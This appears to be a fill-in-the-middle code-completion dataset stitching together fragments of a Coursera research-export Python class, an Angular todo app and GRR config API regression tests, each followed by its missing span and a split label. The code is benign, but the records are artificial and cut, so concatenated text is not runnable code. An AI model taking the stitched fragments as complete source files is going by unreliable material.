if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
        Context for this ExportRequest, assuming that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
        Identifier for the scope, assuming that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
        Human-readable name for this scope context: course slugs for courses,
        partner short names for partners, but only group ids for groups (the
        groups API is not public).
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
        Display-only property for schema names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name']) | conditional_block |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
    Represents an export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
        No validation is performed, except that only one scope
        specification (course/partner/group) is serialized.
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def | (cls, **kwargs):
"""
        Create an ExportRequest object using the required parameters. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
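        # Map the user-facing hashing option onto the API's anonymity levels.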
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
        Context for this ExportRequest, assuming that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
        Identifier for the scope, assuming that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
        Human-readable name for this scope context: course slugs for courses,
        partner short names for partners, but only group ids for groups (the
        groups API is not public).
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
        Display-only property for schema names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| from_args | identifier_name |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents a export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done with the exception that only specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
Create a ExportResource object using the parameters required. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK: | else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest; assumes that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope; assumes that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human-readable name for this scope context: course slugs for courses,
partner short names for partners, but only group ids for groups (the
API is not open).
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display-only property for schema names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False | return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES' | random_line_split |
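# A usage sketch for the ExportRequest class above, assuming the module-level
# imports resolve; the course id and purpose below are made-up example values.
request = ExportRequest(
    course_id='abc123CourseId',                     # hypothetical id
    export_type=EXPORT_TYPE_TABLES,
    anonymity_level=ANONYMITY_LEVEL_COORDINATOR,
    statement_of_purpose='Study learner engagement.',
    schema_names=['users', 'demographics'])
payload = request.to_json()
assert payload['scope'] == {
    'typeName': 'courseContext',
    'definition': {'courseId': 'abc123CourseId'}}
assert payload['exportType'] == EXPORT_TYPE_TABLES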
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents an export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done, except that only one specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
Create an ExportRequest object using the required parameters. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
|
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest; assumes that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope; assumes that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human-readable name for this scope context: course slugs for courses,
partner short names for partners, but only group ids for groups (the
API is not open).
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display-only property for schema names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| return self._export_type | identifier_body |
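# A round-trip sketch for the serialization pair above: to_json followed by
# from_json should reproduce an equal object via the __eq__ override. The
# partner id and interval are made-up example values.
original = ExportRequest(
    partner_id=42,
    export_type=EXPORT_TYPE_CLICKSTREAM,
    anonymity_level=ANONYMITY_LEVEL_ISOLATED,
    interval=['2016-01-01', '2016-06-01'])
restored = ExportRequest.from_json(original.to_json())
assert restored == original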
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void |
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| {
this.addTodo(inputElement.value);
inputElement.value = '';
} | identifier_body |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void { |
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule); | const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
} | random_line_split |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
| (public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| constructor | identifier_name |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) | else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| {
todo.title = target.value;
this.todoEdit = null;
} | conditional_block |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
|
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
| api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe")) | identifier_body |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def | (self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
| Run | identifier_name |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
